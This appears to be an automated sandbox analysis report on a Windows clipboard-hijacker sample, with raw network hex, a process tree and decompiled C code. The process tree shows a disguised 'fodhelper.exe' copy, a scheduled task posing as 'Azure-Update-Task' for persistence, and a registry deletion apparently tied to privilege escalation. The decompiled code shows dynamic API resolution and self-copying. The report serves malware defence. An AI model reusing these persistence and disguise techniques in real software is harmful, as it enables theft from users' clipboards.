                    2021-10-08 15:51:51 UTC80INData Raw: 6e 8f cd 1f f8 1a 45 bb 3b bb ef c1 9f 3b 2c 38 4b 12 a1 36 b8 97 b4 9e 41 a3 9d 93 cf 37 8b c4 85 ed 78 a3 44 a9 ef 8c 63 b8 58 12 0d 30 b0 94 a2 1c 5f 79 88 c9 aa b2 f9 c9 e9 fd a6 51 ca f6 f0 8c 48 2c c3 4f fc 74 2c 7a 14 a5 2e 41 1d 7f 22 e8 0c 97 4e 24 b9 a7 72 7d 9e 3c db a4 db 5c e6 64 e1 35 29 6c 4a 9b 31 ee c2 13 b0 30 dc 5c f8 44 36 b8 c5 95 46 85 7a 15 97 87 63 f0 f8 e4 15 a0 ae 68 81 3a f1 9c b6 af af 67 3d 99 fa 07 3e 4a fe 4c 25 c7 7e 34 71 54 70 96 e8 f0 73 9a bd f3 71 a8 05 b9 c4 16 fa 5e ea 24 a6 bd 41 6f 50 ec f5 f9 63 cc a8 dc 3f 8b c4 6d 09 d0 ea aa 86 5d ae 3a a9 89 02 26 74 55 f2 59 90 c8 e2 6c fe 5c 63 b6 af af 61 2f b6 78 7b 85 43 6d bc df d5 89 04 9f 10 a9 51 9f b2 06 d4 c3 1a ff 2a 22 62 b1 1f ed 03 bc cf be 71 aa 46 f4 f8 4c 2c
                    Data Ascii: nE;;,8K6A7xDcX0_yQH,Ot,z.A"N$r}<\d5)lJ10\D6Fzch:g=>JL%~4qTpsq^$AoPc?m]:&tUYl\ca/x{CmQ*"bqFL,
                    2021-10-08 15:51:51 UTC81INData Raw: d9 88 2f 5d 25 9e 41 e7 9d fa d8 e6 04 cf 37 ca af 06 91 65 0c 09 5b 20 12 f2 e0 a5 15 45 00 c5 1f 90 22 fb e4 2d f4 fb a1 c9 29 a9 30 7c 37 85 6e 22 5a 17 b4 45 eb 3a 1b c8 a7 96 64 f3 8e 5a d4 ff ab a0 0c d1 3c 17 37 e0 e0 a1 83 a1 c9 68 8a 09 5b 61 65 37 ca ea b2 74 dc 96 67 c2 98 72 92 70 d1 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f3 87 82 f9 9a 3d dc d4 c3 5b 69 91 2f 92 da d2 fe 61 9c b4 fc 24 1c 09 f4 97 be 91 5b a3 32 c1 e9 5e 66 3a 99 02 c5 1f 90 21 9d 3a 5e af 11 ed b8 63 b0 b4 fd 5a c3 93 57 4a 74 20 4f 88 0d 65 38 48 83 c5 d8 ca de de 2f cb ad eb 0e 27 61 d9 bb 5a 17 7d 72 d8 32 dd d8 ca 48 f3 95 26 dd 04 44 78 92 e5 97 31 7b 8e 9b 60 27 b8 f5 97 45 96 ad da a7 2c 72 fa dc 42 6b 87 71 d5 86 eb fb 7b e6 1f cd ba 5e
                    Data Ascii: /]%A7e[ E"-)0|7n"ZE:dZ<7h[ae7tgrp=3K n=[i/a$[2^f:!:^cZWJt Oe8H/'aZ}r2H&Dx1{`'E,rBkq{^
                    2021-10-08 15:51:51 UTC83INData Raw: 4f 67 5f 59 75 2e 4c 3c 56 94 29 bc 75 a0 b9 fd a6 55 12 f1 cf 53 7e a7 b3 98 5c ec 9d cc d7 0b 60 ac 63 3f 22 e8 0b 9f c4 db 30 4a 25 e6 9d cc d4 af a9 b4 07 32 5c d0 d4 b2 0a 9d bf 11 6e dd a6 aa a1 36 47 f0 43 8b e0 8c 47 94 5b 4e f5 e2 87 ee 4f 63 5f 4e f3 ce b5 f9 9c 2f 49 0a 22 e8 f4 10 ec fd e3 16 9e 25 cf 53 7f 19 f5 e2 87 ee 02 ca ab ed 7f 88 f2 f3 8e 1b 86 08 92 4b 98 59 4a 13 01 26 55 63 51 6c c9 29 a8 56 6b b8 7f 88 0d 65 38 4c 37 a4 30 5a cf 53 7f 19 f5 e2 87 ee 02 ca ab ed 7f 88 f2 f3 8e 1b d4 ab 98 57 79 0d 34 26 53 63 47 81 1e 69 42 64 b6 75 a0 b9 fd 59 1b 86 08 9c 55 7f 14 a4 34 30 57 63 42 06 b0 2d b2 72 d8 c0 6c 36 b8 7f 77 64 e3 0f 18 8c 62 d1 57 57 7c 9b d4 a1 8d ee 02 ca ab ef 7b 92 da 2d b2 72 9a 49 91 c2 eb 1f df 2f d8 af 8e 69 30
                    Data Ascii: Og_Yu.L<V)uUS~\`c?"0J%2\n6GCG[NOc_N/I"%SKYJ&UcQl)Vke8L70ZSWy4&ScGiBduYU40WcB-rl6wdbWW|{-rI/i0
                    2021-10-08 15:51:51 UTC84INData Raw: 45 15 b8 68 c0 d2 fc ac db a4 05 dc d7 0a 55 ba 26 de 24 3b c5 f7 cb 7e 0b 9f ce f0 ef 70 96 a5 2d 4d 01 a9 34 42 25 dd 35 7d 86 5d a8 5a df d6 6c 6a 3b 2c 08 ee ea ab b1 10 13 79 0e 0f 91 e7 fa e0 1f 6f 52 63 33 81 3f 89 37 32 6b ca 73 d1 c3 e5 4b 6f b8 d0 45 14 ff 28 ce 49 b0 e6 10 13 8c 09 b3 f4 51 4b c6 1a f8 4f 8e 1b 86 0b 93 24 13 72 d8 8c 9e b9 2f 35 e5 e5 08 e9 89 eb 7b 2c 6c ef ec a8 9a 0b 33 91 5b 55 5b 20 78 e6 85 85 85 85 8a a8 b6 f0 52 4b 71 96 73 a2 a0 b9 fc db 32 d7 88 0d 24 22 ff c3 0a 54 eb 22 4e db 94 1a 04 8e 93 5f 2f 49 d5 cf 53 3d 27 c7 24 5d 1b 67 55 47 30 0a 31 30 6c c9 69 cf f4 4d a6 0c b9 e9 9d 40 a1 36 dd b0 ae 97 4e 87 e2 0d 65 38 4c 7e 4e 79 2d 3f dd 18 c1 a2 23 89 06 b0 34 1b dc 17 4e 7e 0b 68 96 c6 61 a4 80 72 27 5c a8 7d 9a
                    Data Ascii: EhU&$;~p-M4B%5}]Zlj;,yoRc3?72ksKoE(IQKO$r/5{,l3[U[ xRKqs2$"T"N_/IS='$]gUG010liM@6Ne8L~Ny-?#4N~har'\}
                    2021-10-08 15:51:51 UTC86INData Raw: 06 d4 28 a7 28 d9 b5 8b 7c 36 cc b0 6d 4d ff 12 25 15 6e b0 6d 4c 7d 72 23 18 d0 c4 46 eb 8b 1f 4a fc db ab 1e 0d a1 48 25 cd f0 5a c7 7f 87 61 d0 45 ef d6 21 56 6b b8 8a ed 68 3c 13 fe 28 67 04 33 a8 4a fe 4c 25 c7 7e 34 71 aa a1 37 f7 70 10 67 c2 67 c6 fa f7 5b ab 1d de 56 b4 ff cf 07 a9 b8 80 b8 b9 f7 f0 52 4b c9 f1 02 99 b5 93 4b 71 00 05 da 11 33 99 ec 0d 8e e4 15 7c 6c 20 d1 c3 e5 67 7b 85 7d 37 47 f0 46 57 a5 ba 95 25 fa 46 37 90 e0 d3 18 00 3a ac 9f 2c 2f b6 7b 6c 71 00 c9 c2 98 33 c0 ea 10 10 a9 57 17 7d 72 d0 00 de 30 60 53 f2 f2 15 90 20 12 f1 8b 2c 7a c2 73 5a 9e 41 74 34 be cb a5 d2 bf 11 66 01 70 38 4c 7c f0 a2 a3 31 fe a3 cd 33 c0 9b 00 82 15 78 e6 ef 30 d1 c0 d6 43 e6 ef 84 07 ec ab 0a 84 fc db aa da 3a 04 90 cb 77 9b 45 15 25 76 e1 63 33
                    Data Ascii: ((|6mM%nmL}r#FJH%ZaE!Vkh<(g3JL%~4q7pgg[VRKKq3|l g{}7GFW%F7:,/{lq3W}r0`S ,zsZAt4fp8L|13x0C:wE%vc3
                    2021-10-08 15:51:51 UTC87INData Raw: ac 90 dc d5 af 2b 67 b4 b0 e4 fa 51 09 4b bc 89 87 cc 3b 18 d6 9e 98 ba 87 f8 c3 23 8d d7 c0 93 a7 d7 79 80 09 d2 b5 8e 0b 2e 1f 84 4d 74 ea 13 b5 70 18 76 36 ce e6 b8 d6 58 5a c5 0f 22 e8 f4 10 ee 78 0e 24 97 69 c9 7a 28 7d 62 fa e0 20 86 07 96 aa 5e a7 d5 c8 4f c0 18 27 28 75 cf f4 4b a4 af 15 87 5e 4f 03 4c 7f c6 4a b1 64 a6 1b 79 67 49 2d 88 0d 65 3a fe c0 55 99 45 60 76 6a 92 76 71 96 d1 c3 e5 b2 9a 38 0d 1e fd 07 95 f7 67 c2 92 67 d5 b9 fd dd 5e 4f 03 0d 6f e4 4b fb 13 b8 0b b8 0b 33 03 11 37 91 fc 7b 83 6b b8 7f 7d 5a 77 a7 28 d9 ab df b6 7b 2c a7 bb a6 55 53 39 e8 9c 2d 3b b7 a7 8e 41 22 24 cb 5b df a5 51 43 19 7e f1 ea 10 2a a1 36 b8 61 59 f3 49 7e 27 28 36 32 c2 dd 62 b5 bf 9a c8 2c d0 45 09 26 c9 ee 89 5c 28 0f 15 78 1d 08 92 2d ed 0b 40 d6 ac
                    Data Ascii: +gQK;#y.Mtpv6XZ"x$iz(}b ^O'(uK^OLJdygI-e:UE`vjvq8gg^OoK37{k}Zw({,US9-;A"$[QC~*6aYI~'(62b,E&\(x-@
                    2021-10-08 15:51:51 UTC88INData Raw: ed 83 09 a4 af e3 1c e1 60 27 aa b5 fa 96 d1 c3 13 15 90 dc 92 ae 98 76 68 d8 8d 12 f1 02 3e 1f 19 7d 37 41 02 97 3c aa 1b 0f 9b 31 5d 68 49 93 f1 da 32 fa 9c d1 b7 ab 21 1e ce e8 11 e5 93 58 96 64 5e 58 66 3b 98 db 54 ce bd e0 41 e3 d5 46 2f ca 23 94 a2 4b 90 70 2b e8 79 6c 35 80 3f 25 db dd a6 aa a0 be 0b ed 7f 88 04 03 a4 50 0d 99 f5 18 f7 dd d2 40 a0 b8 78 73 d7 b4 89 71 ad 22 96 c2 13 26 e1 e8 f4 18 3d 85 81 2d 4d f7 13 b2 f9 4c f7 90 65 b3 0b 9f cb 8c fe d7 b4 f6 72 30 39 8e 76 11 cf 36 f5 93 e6 93 cb 23 12 e6 91 a0 ad fd d0 c5 e0 1f 6f 58 e4 6b 4c 09 5b 2c 52 08 ca d7 49 1e 1a 76 61 2f b6 7b 65 45 6a cf 42 9b b6 06 57 df d5 aa d5 13 73 1a 89 4c bf 4a 67 f9 1f 94 0d 31 30 1d 8f 16 e2 b4 89 87 01 8b 1f 42 57 1b a2 3f 22 1b a2 3f 22 13 57 43 6f 74 d8
                    Data Ascii: `'vh>}7A<1]hI2!Xd^Xf;TAF/#Kp+yl5?%P@xsq"&=-MLer09v6#oXkL[,RIva/{eEjBWsLJg10BW?"?"WCot
                    2021-10-08 15:51:51 UTC91INData Raw: 91 b2 fb c5 46 37 90 e0 d3 39 9f 3b db df 98 b8 7c a5 59 3b 5a fa 2f 49 91 a2 0a f8 31 d3 14 35 f6 e9 33 49 f5 93 ab d7 a3 cc 02 ca ea e8 28 87 40 d4 c3 1a fb 5e cf c7 af bc db b8 0b 35 55 d1 61 ca 20 e2 0e 18 00 dc a4 b9 c1 e9 89 af f7 70 27 e6 62 b1 ae 4c a7 bf 01 c1 72 81 25 c4 5d 16 fa 1f 80 93 4f fb e4 61 df b5 06 2b b4 ee eb b8 7f 88 f5 9d 57 eb 3e d1 3c 17 59 ad 8e 0b e9 12 a8 03 16 3a 62 6f 24 dc 53 0d 65 37 15 90 d8 88 86 30 68 3f d5 cd cf 72 53 f9 c9 a2 4b fa 0f 83 68 38 09 d0 4e d4 4e 97 5a da 80 06 c4 16 06 91 29 88 84 67 0d 9a 5c a3 8c 32 91 ca fe e8 c7 db ab 16 5b c8 5b 65 b3 f4 10 fc ed 68 38 09 d0 9a b1 8b a4 af 8e 1b c7 00 11 06 81 bc b9 fe 6d c5 e7 24 95 58 d4 4a be bd f8 de 58 75 d4 96 2e 74 51 cb ed db 0a 82 a3 97 d5 15 87 92 ae ae e3
                    Data Ascii: F79;|Y;Z/I153I(@^5Ua p'bLr%]Oa+W><Y:bo$Se70h?rSKh8NNZ)g\2[[eh8m$XJXu.tQ



                    System Behavior

                    General

                    Start time:17:50:03
                    Start date:08/10/2021
                    Path:C:\Users\user\Desktop\hTu8FeYy28.exe
                    Wow64 process (32bit):true
                    Commandline:'C:\Users\user\Desktop\hTu8FeYy28.exe'
                    Imagebase:0x400000
                    File size:1195008 bytes
                    MD5 hash:A003B564BD23880F99A29006E780A89B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:Borland Delphi
                    Reputation:low

                    General

                    Start time:17:51:50
                    Start date:08/10/2021
                    Path:C:\Users\user\Desktop\hTu8FeYy28.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\hTu8FeYy28.exe
                    Imagebase:0x400000
                    File size:1195008 bytes
                    MD5 hash:A003B564BD23880F99A29006E780A89B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000011.00000001.524041171.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    Reputation:low

                    General

                    Start time:17:51:51
                    Start date:08/10/2021
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
                    Imagebase:0xd80000
                    File size:232960 bytes
                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:17:51:51
                    Start date:08/10/2021
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:/C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe'
                    Imagebase:0x1230000
                    File size:185856 bytes
                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:17:51:51
                    Start date:08/10/2021
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7f20f0000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:17:51:52
                    Start date:08/10/2021
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7f20f0000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:17:51:52
                    Start date:08/10/2021
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
                    Imagebase:0xd80000
                    File size:232960 bytes
                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:17:51:52
                    Start date:08/10/2021
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7f20f0000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:17:51:53
                    Start date:08/10/2021
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
                    Imagebase:0xd80000
                    File size:232960 bytes
                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:17:51:53
                    Start date:08/10/2021
                    Path:C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                    Imagebase:0x400000
                    File size:1195008 bytes
                    MD5 hash:A003B564BD23880F99A29006E780A89B
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:Borland Delphi

                    General

                    Start time:17:51:53
                    Start date:08/10/2021
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7f20f0000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    General

                    Start time:17:51:53
                    Start date:08/10/2021
                    Path:C:\Windows\SysWOW64\reg.exe
                    Wow64 process (32bit):true
                    Commandline:reg delete hkcu\Environment /v windir /f
                    Imagebase:0xee0000
                    File size:59392 bytes
                    MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    General

                    Start time:17:51:54
                    Start date:08/10/2021
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7f20f0000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    Disassembly

                    Code Analysis


                      Executed Functions

                      C-Code - Quality: 93%
                      			E00401000() {
                      				struct HINSTANCE__* _v8;
                      				struct HINSTANCE__* _v12;
                      				struct HINSTANCE__* _v16;
                      				struct HINSTANCE__* _v20;
                      				struct HINSTANCE__* _t11;
                      				_Unknown_base(*)()* _t12;
                      				struct HINSTANCE__* _t15;
                      				struct HINSTANCE__* _t16;
                      				_Unknown_base(*)()* _t19;
                      				_Unknown_base(*)()* _t28;
                      				_Unknown_base(*)()* _t40;
                      				_Unknown_base(*)()* _t49;
                      				void* _t50;
                      				struct HINSTANCE__* _t52;
                      				void* _t54;
                      				struct HINSTANCE__* _t56;
                      				void* _t58;
                      				struct HINSTANCE__* _t60;
                      				struct HINSTANCE__* _t61;
                      				struct HINSTANCE__* _t62;
                      
                      				_t11 = LoadLibraryW(L"kernel32.dll");
                      				_v8 = _t11;
                      				if(_t11 != 0) {
                      					_t12 = GetProcAddress(_t11, "LoadLibraryW");
                      					 *0x40400c = _t12;
                      					_v12 =  *_t12(L"Shlwapi.dll", _t54, _t58, _t50);
                      					_v20 = LoadLibraryW(L"ntdll.dll");
                      					_t15 = LoadLibraryW(L"Shell32.dll");
                      					_t16 = LoadLibraryW(L"Ole32.dll"); // executed
                      					_v16 = LoadLibraryW(L"User32.dll");
                      					LoadLibraryW(L"Ole32.dll");
                      					_t19 = GetProcAddress(_v8, "GetProcAddress");
                      					_t60 = _v8;
                      					 *0x404038 = _t19;
                      					 *0x40401c =  *_t19(_t60, "GetModuleFileNameW");
                      					 *0x404044 = GetProcAddress(_t60, "CreateDirectoryW");
                      					 *0x404024 = GetProcAddress(_t60, "GlobalAlloc");
                      					 *0x40403c = GetProcAddress(_t60, "GlobalFree");
                      					 *0x404000 = GetProcAddress(_t60, "GlobalLock");
                      					 *0x404034 = GetProcAddress(_t60, "GlobalUnlock");
                      					 *0x404010 = GetProcAddress(_t60, "LocalAlloc");
                      					 *0x404030 = GetProcAddress(_t60, "LocalFree");
                      					_t28 = GetProcAddress(_t60, "lstrlenW");
                      					_t61 = _v12;
                      					 *0x404020 = _t28;
                      					 *0x404018 = GetProcAddress(_t61, "StrChrW");
                      					 *0x404054 = GetProcAddress(_t61, "StrStrW");
                      					GetProcAddress(_t61, "StrStrIW");
                      					GetProcAddress(_t61, "StrToIntExW");
                      					 *0x404058 = GetProcAddress(_t61, "PathIsDirectoryW");
                      					GetProcAddress(_t16, "CoInitialize");
                      					_t56 = _v8;
                      					GetProcAddress(_t56, "HeapFree");
                      					GetProcAddress(_t56, "CreateMutexA");
                      					 *0x404040 = GetProcAddress(_t56, "CreateMutexW");
                      					 *0x40402c = GetProcAddress(_t56, "GetLastError");
                      					GetProcAddress(_t15, "SHGetFolderPathA");
                      					_t40 = GetProcAddress(_t61, "PathAppendW");
                      					_t62 = _v16;
                      					 *0x404014 = _t40;
                      					GetProcAddress(_t62, "StringCbPrintfW");
                      					_t52 = _v20;
                      					 *0x404028 = GetProcAddress(_t52, "memset");
                      					GetProcAddress(_t52, "wmemset");
                      					 *0x404004 = GetProcAddress(_t52, "memcpy");
                      					 *0x404048 = GetProcAddress(_t62, "OpenClipboard");
                      					 *0x40405c = GetProcAddress(_t62, "GetClipboardData");
                      					 *0x404008 = GetProcAddress(_t62, "EmptyClipboard");
                      					 *0x404050 = GetProcAddress(_t62, "SetClipboardData");
                      					_t49 = GetProcAddress(_t62, "CloseClipboard");
                      					 *0x40404c = _t49;
                      					return _t49;
                      				}
                      				return _t11;
                      			}
























                      APIs
                      • LoadLibraryW.KERNEL32(kernel32.dll,00402039), ref: 0040100B
                      • GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 0040102B
                      • LoadLibraryW.KERNEL32(ntdll.dll), ref: 00401041
                      • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040104F
                      • LoadLibraryW.KERNELBASE(Ole32.dll), ref: 0040105C
                      • LoadLibraryW.KERNEL32(User32.dll), ref: 00401069
                      • LoadLibraryW.KERNEL32(Ole32.dll), ref: 00401077
                      • GetProcAddress.KERNEL32(?,GetProcAddress), ref: 00401085
                      • GetProcAddress.KERNEL32(?,CreateDirectoryW), ref: 004010A2
                      • GetProcAddress.KERNEL32(?,GlobalAlloc), ref: 004010B3
                      • GetProcAddress.KERNEL32(?,GlobalFree), ref: 004010C4
                      • GetProcAddress.KERNEL32(?,GlobalLock), ref: 004010D5
                      • GetProcAddress.KERNEL32(?,GlobalUnlock), ref: 004010E6
                      • GetProcAddress.KERNEL32(?,LocalAlloc), ref: 004010F7
                      • GetProcAddress.KERNEL32(?,LocalFree), ref: 00401108
                      • GetProcAddress.KERNEL32(?,lstrlenW), ref: 00401119
                      • GetProcAddress.KERNEL32(?,StrChrW), ref: 0040112D
                      • GetProcAddress.KERNEL32(?,StrStrW), ref: 0040113E
                      • GetProcAddress.KERNEL32(?,StrStrIW), ref: 0040114F
                      • GetProcAddress.KERNEL32(?,StrToIntExW), ref: 0040115B
                      • GetProcAddress.KERNEL32(?,PathIsDirectoryW), ref: 00401167
                      • GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 00401178
                      • GetProcAddress.KERNEL32(?,HeapFree), ref: 00401187
                      • GetProcAddress.KERNEL32(?,CreateMutexA), ref: 00401193
                      • GetProcAddress.KERNEL32(?,CreateMutexW), ref: 0040119F
                      • GetProcAddress.KERNEL32(?,GetLastError), ref: 004011B0
                      • GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 004011C1
                      • GetProcAddress.KERNEL32(?,PathAppendW), ref: 004011CD
                      • GetProcAddress.KERNEL32(?,StringCbPrintfW), ref: 004011E1
                      • GetProcAddress.KERNEL32(?,memset), ref: 004011F0
                      • GetProcAddress.KERNEL32(?,wmemset), ref: 00401201
                      • GetProcAddress.KERNEL32(?,memcpy), ref: 0040120D
                      • GetProcAddress.KERNEL32(?,OpenClipboard), ref: 0040121E
                      • GetProcAddress.KERNEL32(?,GetClipboardData), ref: 0040122F
                      • GetProcAddress.KERNEL32(?,EmptyClipboard), ref: 00401240
                      • GetProcAddress.KERNEL32(?,SetClipboardData), ref: 00401251
                      • GetProcAddress.KERNEL32(?,CloseClipboard), ref: 00401262
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: CloseClipboard$CoInitialize$CreateDirectoryW$CreateMutexA$CreateMutexW$EmptyClipboard$GetClipboardData$GetLastError$GetModuleFileNameW$GetProcAddress$GlobalAlloc$GlobalFree$GlobalLock$GlobalUnlock$HeapFree$LoadLibraryW$LocalAlloc$LocalFree$Ole32.dll$OpenClipboard$PathAppendW$PathIsDirectoryW$SHGetFolderPathA$SetClipboardData$Shell32.dll$Shlwapi.dll$StrChrW$StrStrIW$StrStrW$StrToIntExW$StringCbPrintfW$User32.dll$kernel32.dll$lstrlenW$memcpy$memset$ntdll.dll$wmemset
                      • API String ID: 2238633743-2663791167
                      • Opcode ID: cb6c014d7e83f726a4f9952ea36cf0c45aa23e724227ae9a220ad06ac8f98dc9
                      • Instruction ID: 0d8912e4709423bace0949b2378a9f04a6916989bf431ebed29eca490cc37138
                      • Opcode Fuzzy Hash: cb6c014d7e83f726a4f9952ea36cf0c45aa23e724227ae9a220ad06ac8f98dc9
                      • Instruction Fuzzy Hash: AF5179F2A51310ABC700BFB5AE0DA8A7EFCAA897477118477B305F21A1D7B856448F5C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 88%
                      			E00401272() {
                      				short _v524;
                      				short _v1044;
                      				WCHAR* _t15;
                      				int _t19;
                      				WCHAR* _t24;
                      
                      				GetModuleFileNameW(0,  &_v1044, 0x104);
                      				_t15 =  &_v524;
                      				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t15); // executed
                      				if(_t15 >= 0) {
                      					PathAppendW( &_v524, L"\\Microsoft\\TelemetryServices");
                      					_t19 = PathIsDirectoryW( &_v524); // executed
                      					if(_t19 == 0) {
                      						CreateDirectoryW( &_v524, 0); // executed
                      					}
                      					PathAppendW( &_v524, L"\\fodhelper.exe");
                      					_t24 = StrStrW( &_v1044,  &_v524);
                      					_t37 = _t24;
                      					if(_t24 == 0) {
                      						CopyFileW( &_v1044,  &_v524, 0); // executed
                      						E00401339( &_v524, __eflags); // executed
                      						ExitProcess(0xffffffff);
                      					} else {
                      						return E00401339( &_v524, _t37);
                      					}
                      				}
                      				return _t15;
                      			}








                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040128B
                      • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0040129D
                      • PathAppendW.SHLWAPI(?,\Microsoft\TelemetryServices), ref: 004012B3
                      • PathIsDirectoryW.SHLWAPI(?), ref: 004012C0
                      • CreateDirectoryW.KERNELBASE(?,00000000), ref: 004012D2
                      • PathAppendW.SHLWAPI(?,\fodhelper.exe), ref: 004012E4
                      • StrStrW.SHLWAPI(?,?), ref: 004012F8
                      • CopyFileW.KERNELBASE(?,?,00000000), ref: 0040131F
                      • ExitProcess.KERNEL32 ref: 00401332
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Path$AppendDirectoryFile$CopyCreateExitFolderModuleNameProcess
                      • String ID: 6Nu$\Microsoft\TelemetryServices$\fodhelper.exe
                      • API String ID: 3994694214-3558657006
                      • Opcode ID: f66f439708cc94b4e392840ca1cbe4dfe63c53fae8d3378df9d81e2ac14c362b
                      • Instruction ID: e9cc1551c9dc342d01193394a0d7173058b5a03e9f69f18b49f700f051a2f683
                      • Opcode Fuzzy Hash: f66f439708cc94b4e392840ca1cbe4dfe63c53fae8d3378df9d81e2ac14c362b
                      • Instruction Fuzzy Hash: DC111FB1500229ABDB20DFA1DD4CECB7B7CAB45305F0005B1B769F20A1EA7497C48F68
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • LoadLibraryW.KERNEL32(kernel32.dll,00402039), ref: 0040100B
                      • GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 0040102B
                      • LoadLibraryW.KERNELBASE(Ole32.dll), ref: 0040105C
                      • GetProcAddress.KERNEL32(?,GetProcAddress), ref: 00401085
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000001.524041171.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000011.00000001.524065932.0000000000405000.00000040.00020000.sdmp
                      Yara matches
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: CloseClipboard$CoInitialize$CreateDirectoryW$CreateMutexA$CreateMutexW$EmptyClipboard$GetClipboardData$GetLastError$GetModuleFileNameW$GetProcAddress$GlobalAlloc$GlobalFree$GlobalLock$GlobalUnlock$HeapFree$LoadLibraryW$LocalAlloc$LocalFree$Ole32.dll$OpenClipboard$PathAppendW$PathIsDirectoryW$SHGetFolderPathA$SetClipboardData$Shell32.dll$Shlwapi.dll$StrChrW$StrStrIW$StrStrW$StrToIntExW$StringCbPrintfW$User32.dll$kernel32.dll$lstrlenW$memcpy$memset$ntdll.dll$wmemset
                      • API String ID: 2574300362-2663791167
                      • Opcode ID: cb6c014d7e83f726a4f9952ea36cf0c45aa23e724227ae9a220ad06ac8f98dc9
                      • Instruction ID: 0d8912e4709423bace0949b2378a9f04a6916989bf431ebed29eca490cc37138
                      • Opcode Fuzzy Hash: cb6c014d7e83f726a4f9952ea36cf0c45aa23e724227ae9a220ad06ac8f98dc9
